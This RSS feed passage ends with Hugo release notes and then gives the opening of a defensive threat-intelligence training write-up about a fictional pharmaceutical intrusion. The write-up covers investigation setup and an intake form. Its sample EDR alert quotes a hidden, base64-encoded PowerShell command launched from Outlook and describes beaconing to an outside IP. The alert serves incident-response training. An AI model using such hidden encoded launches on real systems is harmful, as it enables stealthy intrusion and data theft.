<li>pagesfromdata: Use relative path for content adapter template metrics <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/1d018ef8573e1cbeca6c05b6df0792cb5f672541/hovercard" href="https://github.com/gohugoio/hugo/commit/1d018ef8573e1cbeca6c05b6df0792cb5f672541"><tt>1d018ef</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anupamojha-eng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anupamojha-eng">@anupamojha-eng</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4602160535" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14999" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14999/hovercard" href="https://github.com/gohugoio/hugo/issues/14999">#14999</a></li>
<li>ci: Re-add macos-latest to the test matrix <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/121bc6ceb232effd98a85a5fec357181be8ff01e/hovercard" href="https://github.com/gohugoio/hugo/commit/121bc6ceb232effd98a85a5fec357181be8ff01e"><tt>121bc6c</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a></li>
<li>images: Deprecate Imaging.Compression and move it down to webp and avif configs <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/cf18b827e2bebe95f87b36bff9937218348a55ca/hovercard" href="https://github.com/gohugoio/hugo/commit/cf18b827e2bebe95f87b36bff9937218348a55ca"><tt>cf18b82</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598625710" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14998" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14998/hovercard" href="https://github.com/gohugoio/hugo/issues/14998">#14998</a></li>
<li>Only support the latest Go version <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/98ad9b3c03278d0af3ebd13f8ec9fc1a71d46745/hovercard" href="https://github.com/gohugoio/hugo/commit/98ad9b3c03278d0af3ebd13f8ec9fc1a71d46745"><tt>98ad9b3</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4595941848" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14997" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14997/hovercard" href="https://github.com/gohugoio/hugo/issues/14997">#14997</a></li>
<li>page: Add IsBranch and deprecate IsNode <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/b89e7fe675457e2ca54548d57958df7d2cd8658c/hovercard" href="https://github.com/gohugoio/hugo/commit/b89e7fe675457e2ca54548d57958df7d2cd8658c"><tt>b89e7fe</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1949125590" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/11574" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/11574/hovercard" href="https://github.com/gohugoio/hugo/issues/11574">#11574</a></li>
<li>images: Force cache invalidation for AVIF target <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/e8fefc8388e2f8c03f441a4f3d9c658edba90d00/hovercard" href="https://github.com/gohugoio/hugo/commit/e8fefc8388e2f8c03f441a4f3d9c658edba90d00"><tt>e8fefc8</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589577076" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14990" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14990/hovercard" href="https://github.com/gohugoio/hugo/issues/14990">#14990</a></li>
<li>images: Add a per-format AVIF hint setting <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/a043d3ec6323d9eb97db128c9fc710612708fa7a/hovercard" href="https://github.com/gohugoio/hugo/commit/a043d3ec6323d9eb97db128c9fc710612708fa7a"><tt>a043d3e</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590662849" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14992" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14992/hovercard" href="https://github.com/gohugoio/hugo/issues/14992">#14992</a></li>
<li>images: Make AVIF chroma subsampling content-aware via the hint <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/341f575d2db6abce3e9fbce871b9251f649e6e14/hovercard" href="https://github.com/gohugoio/hugo/commit/341f575d2db6abce3e9fbce871b9251f649e6e14"><tt>341f575</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4587656335" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14987" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14987/hovercard" href="https://github.com/gohugoio/hugo/issues/14987">#14987</a></li>
<li>Cap AVIF lossy quality at 99 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/248241b6e18ecf0d9cb2706419952ae933ad78d8/hovercard" href="https://github.com/gohugoio/hugo/commit/248241b6e18ecf0d9cb2706419952ae933ad78d8"><tt>248241b</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4566435184" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14981" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14981/hovercard" href="https://github.com/gohugoio/hugo/issues/14981">#14981</a></li>
<li>config: Deprecate the glogal imaging quality setting <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/4e47d95db97292c46553c14af646873666f3a56b/hovercard" href="https://github.com/gohugoio/hugo/commit/4e47d95db97292c46553c14af646873666f3a56b"><tt>4e47d95</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565517391" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14979" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14979/hovercard" href="https://github.com/gohugoio/hugo/issues/14979">#14979</a></li>
<li>images: Make 60 the default quality for AVIF <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/03b4b54220d03716396df254d69a88a8a0b066a6/hovercard" href="https://github.com/gohugoio/hugo/commit/03b4b54220d03716396df254d69a88a8a0b066a6"><tt>03b4b54</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565517391" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14979" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14979/hovercard" href="https://github.com/gohugoio/hugo/issues/14979">#14979</a></li>
<li>livereload: Disconnect from websocket server on pageswap <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/79be0532f1243f2e52b46c5ba0148880947be143/hovercard" href="https://github.com/gohugoio/hugo/commit/79be0532f1243f2e52b46c5ba0148880947be143"><tt>79be053</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572172768" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14983" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14983/hovercard" href="https://github.com/gohugoio/hugo/issues/14983">#14983</a></li>
<li>tpl/tplimpl/embedded: Prevent leading newline in sitemap template <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/0f440460c861d3576579bf4074069b4045e7ddce/hovercard" href="https://github.com/gohugoio/hugo/commit/0f440460c861d3576579bf4074069b4045e7ddce"><tt>0f44046</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562698047" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14977" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14977/hovercard" href="https://github.com/gohugoio/hugo/issues/14977">#14977</a></li>
<li>images: Recover from memory alloc errors in WASM image processors <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/4e17421ec25fb067b22cafaff15785e1d52c04f3/hovercard" href="https://github.com/gohugoio/hugo/commit/4e17421ec25fb067b22cafaff15785e1d52c04f3"><tt>4e17421</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582444694" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14985" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14985/hovercard" href="https://github.com/gohugoio/hugo/issues/14985">#14985</a></li>
<li>images: Add quality setting per image format <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/b01ecd4cd4377921efe427fed8a16326b85f2ace/hovercard" href="https://github.com/gohugoio/hugo/commit/b01ecd4cd4377921efe427fed8a16326b85f2ace"><tt>b01ecd4</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534244824" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14957" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/14957/hovercard" href="https://github.com/gohugoio/hugo/issues/14957">#14957</a></li>
<li>misc: Remove duplicate words in comments <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/45c00b7c162b55ca9bcdd9a664bcf1294aa5d266/hovercard" href="https://github.com/gohugoio/hugo/commit/45c00b7c162b55ca9bcdd9a664bcf1294aa5d266"><tt>45c00b7</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmooring/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmooring">@jmooring</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4511708817" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14936" data-hovercard-type="pull_request" data-hovercard-url="/gohugoio/hugo/pull/14936/hovercard" href="https://github.com/gohugoio/hugo/pull/14936">#14936</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530465237" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14950" data-hovercard-type="pull_request" data-hovercard-url="/gohugoio/hugo/pull/14950/hovercard" href="https://github.com/gohugoio/hugo/pull/14950">#14950</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542402306" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/14965" data-hovercard-type="pull_request" data-hovercard-url="/gohugoio/hugo/pull/14965/hovercard" href="https://github.com/gohugoio/hugo/pull/14965">#14965</a></li>
<li>Add some PNG to AVIF golden test cases <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/28d882ab704e5060687a61210ae20b0027595705/hovercard" href="https://github.com/gohugoio/hugo/commit/28d882ab704e5060687a61210ae20b0027595705"><tt>28d882a</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a></li>
</ul>
<h2>Dependency Updates</h2>
<ul>
<li>build(deps): bump github.com/bits-and-blooms/bitset <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/0d29fc81bb559750644bc163ec67f21f3c36ed1b/hovercard" href="https://github.com/gohugoio/hugo/commit/0d29fc81bb559750644bc163ec67f21f3c36ed1b"><tt>0d29fc8</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump github.com/tetratelabs/wazero <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/bb57404f3d93cd588e98f34c742b8b7c2741a4c7/hovercard" href="https://github.com/gohugoio/hugo/commit/bb57404f3d93cd588e98f34c742b8b7c2741a4c7"><tt>bb57404</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump github.com/rogpeppe/go-internal from 1.14.1 to 1.15.0 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/7d1b1fb33dd7bdbb0d16dde9509ce15d93f7d894/hovercard" href="https://github.com/gohugoio/hugo/commit/7d1b1fb33dd7bdbb0d16dde9509ce15d93f7d894"><tt>7d1b1fb</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump github.com/getkin/kin-openapi from 0.138.0 to 0.139.0 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/77a1147056b465f0bb87f9293b63a7ac5b81ab9e/hovercard" href="https://github.com/gohugoio/hugo/commit/77a1147056b465f0bb87f9293b63a7ac5b81ab9e"><tt>77a1147</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[CTI as a Code in Practice: Reactive Investigation — LifeTech Pharma]]></title>
<description><![CDATA[A complete walkthrough of the methodology applied to a real training scenario: pharmaceutical IP theft, dual entry points, and a DCSync that changes everything.All organizations, names, and data are fictional. This is training assignment A01 from the CTI as a Code repository.Based on the methodol...]]></description>
<link>https://tsecurity.de/de/3580443/hacking/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580443/hacking/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:21 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><strong>A complete walkthrough of the methodology applied to a real training scenario: pharmaceutical IP theft, dual entry points, and a DCSync that changes everything.</strong></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*l8B3xIJssFbBTn0IvOu6Ng.png"></figure><p><em>All organizations, names, and data are fictional. This is training assignment A01 from the CTI as a Code repository.</em></p><h3>Based on the methodology: “CTI as a Code”</h3><p><a href="https://medium.com/@1200km/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46">CTI as a Code: Complete Step-by-Step Methodology</a></p><h3>Contents</h3><ol><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#276c"><strong>The Scenario</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#8c81"><strong>Step 00: Clone, Initialize, and Fill the Template</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#cd59"><strong>Step 0: Intake — What the First Call Captures</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#999a"><strong>Step 1–2: Project Setup and Scope</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#7b9a"><strong>Step R1: Evidence Inventory — What Exists and What Is Missing</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#a778"><strong>Step R1.5: Hands-On Evidence Analysis — VS Code Investigation</strong></a><strong><br></strong><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#966d">1. CrowdStrike Alert — JSON in VS Code</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#2702">2. Decode the PowerShell Payload</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#2db4">3. M365 Message Trace — Rainbow CSV</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#13b3">4. Azure AD Sign-In Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#6238">5. VPN Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#b73e">6. NGFW Log Analysis — Rainbow CSV</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#a734">7. SQL Audit Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#ecca">8. Windows Security Event Log Analysis</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#13de">9. Cross-File Pivot — VS Code Global Search</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#9a59">10. IOC Enrichment — REST Client</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#0bd0">11. Sandbox Analysis — Submit the Binary</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#da15">12. Static Binary Analysis — Hex Editor + Terminal</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#97f1">13. Infrastructure Pivot — REST Client + Global Search</a><br><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#c0c4">14. Splunk Correlation (SIEM Validation)</a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#5829"><strong>Step R2: Timeline — Two Paths, One Actor</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#06d0"><strong>Step R3: Claims Ledger — Every Assertion Traced to Evidence</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#bc78"><strong>Step R4: ATT&amp;CK Mapping — Where Detection Failed</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#7d71"><strong>Step R5: Attribution Assessment — Same Actor or Two?</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#b2e8"><strong>Step R6: Detection Rules — Four That Would Have Changed the Outcome</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#d8bd"><strong>Step R7: Deliverables — What Each Stakeholder Gets</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#cf97"><strong>The Git History: What a Completed Investigation Looks Like</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f#5f5a"><strong>Key Lessons</strong></a></li></ol><h3>The Scenario</h3><p><strong>LifeTech Pharma Ltd.</strong> is a mid-sized Israeli pharmaceutical company in Rehovot. It develops and manufactures generic drugs and biological APIs, exports to the US, EU, and MENA, and recently signed a $52 million licensing deal with a US biopharma partner. The signed formula files are stored on SERVER-RD-02\LicenseDeals\USPartner2024\ — 47 files, approximately 380 MB compressed.</p><p>On <strong>Friday, 15 November 2024 at 18:47 IST</strong>, the on-call SOC analyst receives a CrowdStrike behavioral detection:</p><pre>ALERT: Suspicious PowerShell Activity<br>Severity: High — Behavioral IOA<br>Host: WS-CFO-01.lifetechpharma.local  [Michal Cohen, CFO]<br>Process: powershell.exe (PID 3784)<br>Parent: OUTLOOK.EXE (PID 2240)<br>CommandLine: powershell.exe -NonI -W Hidden -Enc JABjAD0ATgBlAHcA...<br>Timestamp: 2024-11-15T18:42:33Z</pre><p>That’s the visible trigger. The actual breach started <strong>24 days earlier</strong> — and the alert is the second of two entry points, not the first.</p><h3>Step 00: Clone, Initialize, and Fill the Template</h3><p><strong>Before the phone rings.</strong> This step takes three minutes and is done once per investigation — ideally before the alert even comes in, or in the first five minutes after hanging up the initial call.</p><h4>1. Clone the repository (one-time setup)</h4><p>If you have not cloned CTI_as_a_Code yet, do this once on your analyst workstation:</p><pre>cd ~<br>git clone https://github.com/anpa1200/CTI_as_a_Code.git</pre><p>You will never modify this clone. It is your template source. Leave it as-is and pull updates periodically:</p><pre>cd ~/CTI_as_a_Code &amp;&amp; git pull</pre><h4>2. Create your investigations folder</h4><pre>mkdir -p ~/investigations</pre><p>Use any path you prefer — just keep it consistent across all cases. Do not create investigations inside the CTI_as_a_Code clone.</p><h4>3. Copy the reactive template for this case</h4><pre>cp -r ~/CTI_as_a_Code/templates/reactive/ ~/investigations/lifetech-2024-11</pre><p>Naming convention: [org-slug]-[YYYY-MM]. One folder per case. Verify the structure:</p><pre>ls ~/investigations/lifetech-2024-11/<br>tree ~/investigations/lifetech-2024-11/</pre><p>Expected:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/705/1*DR69iFmEn8s2K0zCrhXk5A.png"></figure><pre>00-scope/   01-evidence/   02-sources/   03-analysis/<br>04-detections/   05-deliverables/   06-ai-outputs/   07-feedback/<br>README.md   intake-form.md   project.yml</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zQn6v0h7KSMb9nw5gfYp8Q.png"></figure><h4>4. Initialize git inside the case folder</h4><pre>cd ~/investigations/lifetech-2024-11<br>git init<br>git add .<br>git commit -m "PROJ-2024-001: scaffold initialized from reactive template"</pre><p>This is commit zero. Its purpose is to prove — to a lawyer, an auditor, or yourself — exactly what state you started from before any analysis began.</p><h4>5. Fill in project.yml</h4><p>This file is the single source of truth for project metadata. Open it now:</p><pre>nano project.yml</pre><p>The template has blank fields. Fill every one(During the investigation):</p><pre>project:<br>  id: "PROJ-2024-001"<br>  name: "LifeTech Pharma — Targeted Intrusion"<br>  type: reactive<br>  classification: TLP:AMBER<br>  status: in-progress<br>analyst:<br>  name: "Your Name"<br>  role: "CTI Analyst"<br>  contact: "your@email.com"<br>timeline:<br>  incident_date: "2024-11-15"<br>  detection_date: "2024-11-15"<br>  investigation_start: "2024-11-15"<br>  report_due: "2024-11-17"         # INCD 72h clock - expires 18:47 IST Nov 17<br>pirs:<br>  - id: PIR-001<br>    question: "Was the US licensing formula package (SERVER-RD-02\\USPartner2024\\) accessed or exfiltrated? If so, what and when?"<br>    priority: high<br>    status: open<br>  - id: PIR-002<br>    question: "How did the adversary gain initial access - phishing, credential theft, or exploitation?"<br>    priority: high<br>    status: open<br>  - id: PIR-003<br>    question: "Is there evidence of ongoing access or persistence as of investigation date?"<br>    priority: high<br>    status: open<br>scope:<br>  systems:<br>    - WS-CFO-01<br>    - WS-IT-LEVI<br>    - SERVER-RD-02<br>    - SERVER-FIN-01<br>    - DC01<br>  threat_actor: unknown<br>  attck_techniques: []             # leave blank now - fill during R4<br>deliverables:<br>  - type: executive-brief<br>    status: pending<br>  - type: soc-handoff<br>    status: pending<br>  - type: sigma-rules<br>    count: 0<br>    status: pending<br>notes: "INCD 72h notification clock starts 2024-11-15 18:47 IST. Legal hold on WS-IT-LEVI - no hardware access, RTR only."</pre><p><strong>Do not leave any field as </strong><strong>"" or </strong><strong>[] if you know the value.</strong> Unknown fields are fine — write unknown explicitly. A blank field means "forgot to fill in." unknown means "we looked and do not know yet."</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S90ed0BEsiZXgIu4G3ia5Q.png"></figure><h4>6. Commit the filled metadata</h4><pre>git add project.yml<br>git commit -m "PROJ-2024-001: project.yml filled — 3 PIRs, INCD deadline 2024-11-17 18:47 IST, legal hold WS-IT-LEVI"</pre><p>The folder is now named, scoped, and version-controlled. The intake call can begin.</p><h3>Step 0: Intake — What the First Call Captures</h3><p>Before opening Splunk, before pivoting on the C2 IP, before forming a hypothesis — the intake call runs. This is 15 minutes with the Tier 2 escalation and the IR Lead before any analysis work begins.</p><p>The intake captures facts that change what you look for.</p><p><strong>Open the intake form before dialing:</strong></p><pre>cp intake-form.md 00-scope/intake-2024-11-15.md<br>nano 00-scope/intake-2024-11-15.md</pre><p>The template has 9 sections. Work through them in order during the call — do not paraphrase in real time, write what the reporter says verbatim. You will analyze it after. For LifeTech this call produces:</p><pre># Investigation Intake — PROJ-2024-001 — 2024-11-15<br><br>Completed by: On-call CTI analyst (Yael Mizrahi)<br>Intake call with: Noa Ben-David (IR Lead), Ran Katz (SOC Manager)<br>Call time: 2024-11-15 18:55 IST<br><br>---<br><br>## 1. What was reported?<br><br>**1.1 What did you see or receive that caused you to raise this?**<br>"CrowdStrike fired a high-severity behavioral IOA on Michal Cohen's workstation —<br>PowerShell with base64 payload launched directly from Outlook. Tier 1 pulled the<br>network tab and found 3 outbound connections to 203.0.113.87 over the last 15<br>minutes. This is the CFO's machine. We escalated immediately."<br><br>**1.2 Where did this first come to your attention?**<br>- [x] Alert from SIEM / EDR / AV  ← CrowdStrike Falcon behavioral IOA, severity: High<br><br>**1.3 When did you first notice it?**<br>Date: 2024-11-15   Time: 18:47   Timezone: IST (UTC+2)<br><br>**1.4 Do you believe the activity is still ongoing?**<br>- [x] Yes — still active (C2 connections still firing at time of call)<br><br>---<br><br>## 2. What is already known?<br><br>**2.1 What systems, accounts, or services appear to be involved?**<br>- WS-CFO-01.lifetechpharma.local — Michal Cohen, CFO. Dell Latitude, Windows 11.<br>- 203.0.113.87 — external IP, destination of C2 connections. Not in any allowlist.<br>- OUTLOOK.EXE (PID 2240) → powershell.exe (PID 3784) — parent-child confirmed.<br>- No other hosts identified yet — investigation is 8 minutes old.<br><br>**2.2 What was the observed behavior?**<br>"PowerShell with -NonI -W Hidden -Enc flags spawned from Outlook. The encoded<br>command has not been decoded yet. Three separate TCP connections to 203.0.113.87<br>on port 443 over 15 minutes — looks like a beacon pattern."<br><br>**2.3 Has anyone else already investigated or looked into this?**<br>- [x] Yes — Tier 1 analyst (Omer Cohen) ran initial Splunk queries (last 1 hour only).<br>  What did they touch: read-only Splunk queries. No changes to the endpoint.<br><br>**2.4 What do you think happened?**<br>"Probably a phishing email with a malicious attachment — xlsm macro or something<br>similar. Michal must have opened it in the last few hours. We don't know if anyone<br>else was targeted."<br><br>---<br><br>## 3. Timeline of 